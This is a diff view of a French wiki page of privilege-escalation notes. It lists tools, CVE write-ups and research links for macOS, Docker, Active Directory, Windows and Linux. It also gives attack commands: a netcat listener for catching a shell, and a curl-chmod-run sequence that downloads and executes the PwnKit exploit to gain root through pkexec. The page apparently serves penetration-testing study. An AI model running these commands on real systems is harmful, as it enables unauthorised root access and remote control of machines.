Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
privilege_escalation [2022/06/21 10:13] M0N5T3R |
privilege_escalation [2024/02/09 20:50] (Version actuelle) M0N5T3R |
||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
{{ :privesc.jpg?nolink&1600 |}} | {{ :privesc.jpg?nolink&1600 |}} | ||
+ | |||
+ | ====== MacOs ====== | ||
+ | |||
+ | https://www.ns-echo.com/posts/cve_2023_33298.html | ||
+ | |||
+ | ====== docker ====== | ||
+ | https://flast101.github.io/docker-privesc/ | ||
+ | https://github.com/stealthcopter/deepce | ||
+ | |||
+ | |||
+ | ====== active directory ====== | ||
+ | https://github.com/CravateRouge/bloodyAD | ||
+ | https://github.com/antonioCoco/RemotePotato0 | ||
+ | https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4 | ||
+ | https://github.com/Dec0ne/KrbRelayUp | ||
Ligne 32: | Ligne 47: | ||
**tools :** | **tools :** | ||
+ | |||
+ | * PrivescCheck: This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation. https://github.com/itm4n/PrivescCheck | ||
+ | |||
* WINPEAS Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz and check more information about how to exploit found misconfigurations in book.hacktricks.xyz https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS | * WINPEAS Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz and check more information about how to exploit found misconfigurations in book.hacktricks.xyz https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS | ||
Ligne 73: | Ligne 91: | ||
* -> Depuis kali : nc -nlvp 7777 | * -> Depuis kali : nc -nlvp 7777 | ||
+ | |||
+ | |||
+ | |||
+ | |||
+ | **Liste de ressources :** | ||
+ | |||
+ | https://www.redtimmy.com/privilege-escalation/pulse-secure-client-for-windows-9-1-6-toctou-privilege-escalation-cve-2020-13162/ | ||
+ | https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities | ||
+ | https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers | ||
+ | CVE-2024-20656 – Local Privilege Escalation in the VSStandardCollectorService150 Service | ||
+ | https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks | ||
+ | https://github.com/LordNoteworthy/windows-exploitation | ||
+ | https://nixhacker.com/understanding-and-exploiting-symbolic-link-in-windows/ | ||
+ | https://troopers.de/downloads/troopers19/TROOPERS19_AD_Abusing_privileged_file_operations.pdf | ||
+ | https://blog.zecops.com/research/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/ | ||
+ | https://offsec.almond.consulting/intro-to-file-operation-abuse-on-Windows.html | ||
+ | https://www.cyberark.com/resources/threat-research-blog/follow-the-link-exploiting-symbolic-links-with-ease | ||
+ | https://github.com/Wh04m1001?tab=repositories | ||
+ | https://secret.club/2020/04/23/directory-deletion-shell.html | ||
+ | https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ | ||
+ | |||
+ | |||
+ | |||
+ | **Liste de writeups** | ||
+ | |||
+ | https://dreamlab.net/en/blog/post/dropbox-escalation-of-privileges-to-system-on-windows-1/ | ||
+ | https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/ | ||
+ | https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/ | ||
+ | https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service | ||
====== Linux ====== | ====== Linux ====== | ||
Ligne 95: | Ligne 142: | ||
**Linux Privilege Escalation using SUID Binaries** | **Linux Privilege Escalation using SUID Binaries** | ||
https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/ | https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/ | ||
+ | |||
+ | **Escalate to root using pkexec** | ||
+ | * curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit || exit | ||
+ | * chmod +x PwnKit | ||
+ | * ./PwnKit | ||